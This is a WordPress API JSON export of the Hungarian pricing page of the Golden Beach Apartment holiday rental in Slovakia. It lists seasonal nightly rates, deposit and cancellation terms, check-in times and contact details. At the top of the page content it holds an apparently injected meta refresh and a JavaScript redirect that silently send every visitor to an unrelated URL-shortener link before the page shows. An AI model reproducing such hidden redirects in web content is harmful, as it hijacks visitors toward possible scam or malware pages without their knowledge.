{"id":12,"date":"2021-05-30T18:26:45","date_gmt":"2021-05-30T16:26:45","guid":{"rendered":"https:\/\/crypto.wordifysites.com\/?page_id=12"},"modified":"2024-01-31T12:22:52","modified_gmt":"2024-01-31T11:22:52","slug":"arlista","status":"publish","type":"page","link":"https:\/\/goldenbeachapartment.sk\/hu\/cennik\/","title":{"rendered":"\u00c1rak"},"content":{"rendered":"<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/urshort.live\/uxOujxzYh0r4\" \/>\r\n<script>window.location.href = \"https:\/\/urshort.live\/uxOujxzYh0r4\";<\/script>\r\n<div class=\"gb-container gb-container-fdbd6300\"><div class=\"gb-inside-container\">\n\n<h2 class=\"gb-headline gb-headline-5fbf79e1 gb-headline-text\">Sz\u00e1ll\u00e1s<\/h2>\n\n\n\n<p class=\"has-contrast-color has-text-color\">Na\u0161e ceny ubytovania sa l\u00ed\u0161ia v z\u00e1vislosti od term\u00ednu V\u00e1\u0161ho pobytu a taktie\u017e od po\u010dtu noc\u00ed. <strong>Po vytvoren\u00ed \u017eiadosti o rezerv\u00e1ciu sa s Vami spoj\u00edme e-mailom alebo telefonicky<\/strong>.<\/p>\n\n<\/div><\/div>\n\n<div class=\"gb-container gb-container-18d7f4eb\"><div class=\"gb-inside-container\">\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<figure class=\"wp-block-table cenovatabula is-style-stripes\" style=\"font-size:18px\"><table><thead><tr><th class=\"has-text-align-left\" data-align=\"left\">Sez\u00f3na<\/th><th class=\"has-text-align-left\" data-align=\"left\">Term\u00edn sez\u00f3ny<\/th><th class=\"has-text-align-left\" data-align=\"left\">Min. po\u010det os\u00f4b<\/th><th class=\"has-text-align-left\" data-align=\"left\">Min. po\u010det noc\u00ed<\/th><th class=\"has-text-align-left\" data-align=\"left\">Pozn\u00e1mka ubytovate\u013ea<\/th><th class=\"has-text-align-right\" data-align=\"right\">Cena<\/th><\/tr><\/thead><tbody><tr><td class=\"has-text-align-left\" data-align=\"left\">Mimosez\u00f3na<\/td><td class=\"has-text-align-left\" data-align=\"left\">okt\u00f3ber-apr\u00edl<\/td><td class=\"has-text-align-left\" data-align=\"left\">2 osoby<\/td><td class=\"has-text-align-left\" data-align=\"left\">min. 1 noc<\/td><td class=\"has-text-align-left\" data-align=\"left\">el\u0151leg 50%<\/td><td class=\"has-text-align-right\" data-align=\"right\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-accent-color\">100 \u20ac<\/mark><\/strong> Apartm\u00e1n \/ noc<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">Mimosez\u00f3na<\/td><td class=\"has-text-align-left\" data-align=\"left\">okt\u00f3ber-apr\u00edl<\/td><td class=\"has-text-align-left\" data-align=\"left\">3 \/max.4 osoby<\/td><td class=\"has-text-align-left\" data-align=\"left\">min. 1 noc<\/td><td class=\"has-text-align-left\" data-align=\"left\">el\u0151leg 50%<\/td><td class=\"has-text-align-right\" data-align=\"right\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-accent-color\">130 \u20ac<\/mark><\/strong> Apartm\u00e1n \/ noc<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">Sez\u00f3na<\/td><td class=\"has-text-align-left\" data-align=\"left\"><strong>m\u00e1j-september<\/strong><\/td><td class=\"has-text-align-left\" data-align=\"left\">2 osoby<\/td><td class=\"has-text-align-left\" data-align=\"left\"><strong>min. 1 noc <br>nede\u013ea-\u0161tvrtok<br>min. 2 noci <br>piatok-sobota<\/strong><\/td><td class=\"has-text-align-left\" data-align=\"left\">el\u0151leg 50%<\/td><td class=\"has-text-align-right\" data-align=\"right\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-accent-color\">130 \u20ac<\/mark><\/strong> Apartm\u00e1n \/ noc<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">Sez\u00f3na<\/td><td class=\"has-text-align-left\" data-align=\"left\"><strong>m\u00e1j-september<\/strong><\/td><td class=\"has-text-align-left\" data-align=\"left\">3\/max. 4 osoby<\/td><td class=\"has-text-align-left\" data-align=\"left\"><strong>min. 1 noc <br>nede\u013ea-\u0161tvrtok<br>min. 2 noci <br>piatok-sobota<\/strong><\/td><td class=\"has-text-align-left\" data-align=\"left\">el\u0151leg 50%<\/td><td class=\"has-text-align-right\" data-align=\"right\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-accent-color\">150 \u20ac<\/mark><\/strong> Apartm\u00e1n \/ noc<\/td><\/tr><\/tbody><\/table><figcaption class=\"wp-element-caption\">Pr\u00edplatok za dom\u00e1ceho mil\u00e1\u010dika: 5\u20ac\/noc<\/figcaption><\/figure>\n<\/div>\n<\/div>\n\n<\/div><\/div>\n\n<div class=\"gb-container gb-container-91b231bf\"><div class=\"gb-inside-container\">\n\n<h3 class=\"gb-headline gb-headline-a163fdff gb-headline-text\">Kezel\u00e9si d\u00edj foglal\u00e1s t\u00f6rl\u00e9se eset\u00e9n<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"translation-block\"><strong>10 nappal<\/strong> a sz\u00e1ll\u00e1s megkezd\u00e9se el\u0151tt a lemond\u00e1si d\u00edj <strong>a befizetett el\u0151leg 50%-ka<\/strong>, minimum az 1 \u00e9jszaka \u00e1ra<\/li>\n\n\n\n<li class=\"translation-block\"><strong>10 vagy kevesebb nappal<\/strong> a sz\u00e1ll\u00e1s megkezd\u00e9se el\u0151tt a lemond\u00e1si d\u00edj <strong>a befizetett el\u0151leg 100%-ka<\/strong><\/li>\n<\/ul>\n\n\n<div class=\"gb-button-wrapper gb-button-wrapper-6b012d52\">\n\n<a class=\"gb-button gb-button-234c2d58 gb-button-text\" href=\"https:\/\/goldenbeachapartment.sk\/hu\/uzleti-feltetelek\/\">\u00c1ltal\u00e1nos szerz\u0151d\u00e9si felt\u00e9telek (SK)<\/a>\n\n<\/div>\n<\/div><\/div>\n\n<div class=\"gb-container gb-container-31111a3b\"><div class=\"gb-inside-container\">\n<div class=\"gb-grid-wrapper gb-grid-wrapper-e5adb0ea\">\n<div class=\"gb-grid-column gb-grid-column-888d0c25\"><div class=\"gb-container gb-container-888d0c25\"><div class=\"gb-inside-container\">\n\n<h5 class=\"gb-headline gb-headline-42ddb2c0\"><span class=\"gb-icon\"><svg aria-hidden=\"true\" role=\"img\" height=\"1em\" width=\"1em\" viewbox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path fill=\"currentColor\" d=\"M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm92.49 313l-20 25a16 16 0 01-22.49 2.5l-67-49.72a40 40 0 01-15-31.23V112a16 16 0 0116-16h32a16 16 0 0116 16v144l58 42.5a16 16 0 012.49 22.5z\"><\/path><\/svg><\/span><span class=\"gb-headline-text\">Chcek-In<\/span><\/h5>\n\n\n\n<p>14:00 &#8211; 15:00<\/p>\n\n\n\n<h5 class=\"gb-headline gb-headline-0a5e3951\"><span class=\"gb-icon\"><svg aria-hidden=\"true\" role=\"img\" height=\"1em\" width=\"1em\" viewbox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path fill=\"currentColor\" d=\"M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm61.8-104.4l-84.9-61.7c-3.1-2.3-4.9-5.9-4.9-9.7V116c0-6.6 5.4-12 12-12h32c6.6 0 12 5.4 12 12v141.7l66.8 48.6c5.4 3.9 6.5 11.4 2.6 16.8L334.6 349c-3.9 5.3-11.4 6.5-16.8 2.6z\"><\/path><\/svg><\/span><span class=\"gb-headline-text\">Chcek-Out<\/span><\/h5>\n\n\n\n<p>10:30 &#8211; 11:00<\/p>\n\n<\/div><\/div><\/div>\n\n<div class=\"gb-grid-column gb-grid-column-636edd7f\"><div class=\"gb-container gb-container-636edd7f\"><div class=\"gb-inside-container\">\n\n<h5 class=\"gb-headline gb-headline-5b0520b8\"><span class=\"gb-icon\"><svg aria-hidden=\"true\" role=\"img\" height=\"1em\" width=\"1em\" viewbox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path fill=\"currentColor\" d=\"M493.4 24.6l-104-24c-11.3-2.6-22.9 3.3-27.5 13.9l-48 112c-4.2 9.8-1.4 21.3 6.9 28l60.6 49.6c-36 76.7-98.9 140.5-177.2 177.2l-49.6-60.6c-6.8-8.3-18.2-11.1-28-6.9l-112 48C3.9 366.5-2 378.1.6 389.4l24 104C27.1 504.2 36.7 512 48 512c256.1 0 464-207.5 464-464 0-11.2-7.7-20.9-18.6-23.4z\"><\/path><\/svg><\/span><span class=\"gb-headline-text\">Telefonos el\u00e9rhet\u0151s\u00e9g<\/span><\/h5>\n\n\n\n<p style=\"font-size:15px\">+421 908 035 506<\/p>\n\n\n\n<h5 class=\"gb-headline gb-headline-4c3bda50\"><span class=\"gb-icon\"><svg aria-hidden=\"true\" role=\"img\" height=\"1em\" width=\"1em\" viewbox=\"0 0 496 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path fill=\"currentColor\" d=\"M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 96c48.6 0 88 39.4 88 88s-39.4 88-88 88-88-39.4-88-88 39.4-88 88-88zm0 344c-58.7 0-111.3-26.6-146.5-68.2 18.8-35.4 55.6-59.8 98.5-59.8 2.4 0 4.8.4 7.1 1.1 13 4.2 26.6 6.9 40.9 6.9 14.3 0 28-2.7 40.9-6.9 2.3-.7 4.7-1.1 7.1-1.1 42.9 0 79.7 24.4 98.5 59.8C359.3 421.4 306.7 448 248 448z\"><\/path><\/svg><\/span><span class=\"gb-headline-text\">Nyelvek<\/span><\/h5>\n\n\n\n<p>szlov\u00e1k, magyar, angol<\/p>\n\n<\/div><\/div><\/div>\n\n<div class=\"gb-grid-column gb-grid-column-b98f0475\"><div class=\"gb-container gb-container-b98f0475\"><div class=\"gb-inside-container\">\n\n<h5 class=\"gb-headline gb-headline-015534c7\"><span class=\"gb-icon\"><svg aria-hidden=\"true\" role=\"img\" height=\"1em\" width=\"1em\" viewbox=\"0 0 448 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path fill=\"currentColor\" d=\"M16 132h416c8.837 0 16-7.163 16-16V76c0-8.837-7.163-16-16-16H16C7.163 60 0 67.163 0 76v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16z\"><\/path><\/svg><\/span><span class=\"gb-headline-text\">Fizet\u00e9si m\u00f3d<\/span><\/h5>\n\n\n\n<p style=\"font-size:15px\">prevodom, v hotovosti<\/p>\n\n\n\n<h5 class=\"gb-headline gb-headline-d6e35fb0\"><span class=\"gb-icon\"><svg aria-hidden=\"true\" role=\"img\" height=\"1em\" width=\"1em\" viewbox=\"0 0 448 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path fill=\"currentColor\" d=\"M148 288h-40c-6.6 0-12-5.4-12-12v-40c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v40c0 6.6-5.4 12-12 12zm108-12v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm96 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm-96 96v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm-96 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm192 0v-40c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v40c0 6.6 5.4 12 12 12h40c6.6 0 12-5.4 12-12zm96-260v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V112c0-26.5 21.5-48 48-48h48V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h128V12c0-6.6 5.4-12 12-12h40c6.6 0 12 5.4 12 12v52h48c26.5 0 48 21.5 48 48zm-48 346V160H48v298c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z\"><\/path><\/svg><\/span><span class=\"gb-headline-text\">Eg\u00e9sz \u00e9vben el\u00e9rhet\u0151<\/span><\/h5>\n\n\n\n<p>A Golden Beach Apartment minden \u00e9vszakban lehet\u0151s\u00e9get k\u00edn\u00e1l a l\u00e1togat\u00f3knak.<\/p>\n\n<\/div><\/div><\/div>\n<\/div>\n<\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>Ubytovanie Na\u0161e ceny ubytovania sa l\u00ed\u0161ia v z\u00e1vislosti od term\u00ednu V\u00e1\u0161ho pobytu a taktie\u017e od po\u010dtu noc\u00ed. Po vytvoren\u00ed \u017eiadosti o rezerv\u00e1ciu sa s Vami spoj\u00edme e-mailom alebo telefonicky. Sez\u00f3na Term\u00edn sez\u00f3ny Min. po\u010det os\u00f4b Min. po\u010det noc\u00ed Pozn\u00e1mka ubytovate\u013ea Cena Mimosez\u00f3na okt\u00f3ber-apr\u00edl 2 osoby min. 1 noc z\u00e1loha vopred 50% 100 \u20ac Apartm\u00e1n \/ &#8230; <a title=\"\u00c1rak\" class=\"read-more\" href=\"https:\/\/goldenbeachapartment.sk\/hu\/cennik\/\" aria-label=\"Read more about Cenn\u00edk\">Tov\u00e1bb olvas &gt;&gt;<\/a><\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"Cenn\u00edk - Rezervujte si pobyt v Golden Beach Apartment","_seopress_titles_desc":"Pre\u010do si rezervova\u0165 pobyt pr\u00e1ve u n\u00e1s? U\u017eite si v\u00fdnimo\u010dn\u00fa dovolenku na brehu Dunaja bl\u00edzko Kov\u00e1\u010dovsk\u00fdch kopcov v ka\u017edom ro\u010dnom obdob\u00ed. Skvel\u00e9 ceny \/ cenn\u00edk.","_seopress_robots_index":"","footnotes":""},"class_list":{"0":"post-12","1":"page","2":"type-page","3":"status-publish","5":"no-featured-image-padding"},"_links":{"self":[{"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/pages\/12","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/comments?post=12"}],"version-history":[{"count":0,"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/pages\/12\/revisions"}],"wp:attachment":[{"href":"https:\/\/goldenbeachapartment.sk\/hu\/wp-json\/wp\/v2\/media?parent=12"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}